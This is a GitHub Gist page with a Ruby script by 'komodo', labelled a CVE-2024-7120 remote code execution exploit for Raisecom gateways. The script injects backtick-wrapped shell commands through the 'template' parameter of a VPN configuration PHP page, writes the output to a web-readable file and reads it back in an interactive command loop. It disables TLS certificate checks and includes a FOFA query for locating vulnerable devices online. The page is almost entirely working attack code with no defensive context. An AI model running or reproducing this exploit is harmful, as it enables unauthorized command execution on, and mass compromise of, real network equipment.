Created
August 3, 2024 20:47
-
-
Save komodoooo/bae8e73df6e28278ed737d1b10212648 to your computer and use it in GitHub Desktop.
CVE-2024-7120 exploit
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
require 'http' | |
require 'openssl' | |
puts """ | |
CVE-2024-7120 | |
Raisecom gateway RCE exploit | |
By komodo\n | |
""" | |
=begin | |
FOFA query to search vulnerable targets: | |
title="web user login" && body="<META content\=\"MSHTML 6.00.2900.5583\" name\=GENERATOR></HEAD>" | |
=end | |
def main(url, cmd) | |
url.delete_suffix("/") unless url[-1..-1] != "/" | |
@ctx = OpenSSL::SSL::SSLContext.new() | |
@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE | |
headerz={"Accept"=>"*/*","Accept-Encoding"=>"gzip, deflate", "Connection"=>"keep-alive"} | |
r=HTTP.get(url+"/vpn/list_base_config.php?type=mod&parts=base_config&template=`#{cmd.gsub(" ","+")}>/www/tmp/info.html`", | |
:headers=>headerz, :ssl_context=>@ctx) | |
if r.code != 200 | |
abort("Not vulnerable") | |
else | |
puts HTTP.get(url+"/tmp/info.html", :ssl_context=>@ctx).body | |
end | |
end | |
begin | |
print"\nBase URL: " | |
u=gets.chomp | |
while true | |
print"\n> " | |
main(u, gets.chomp) | |
end | |
rescue => e | |
abort(e.to_s) | |
end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment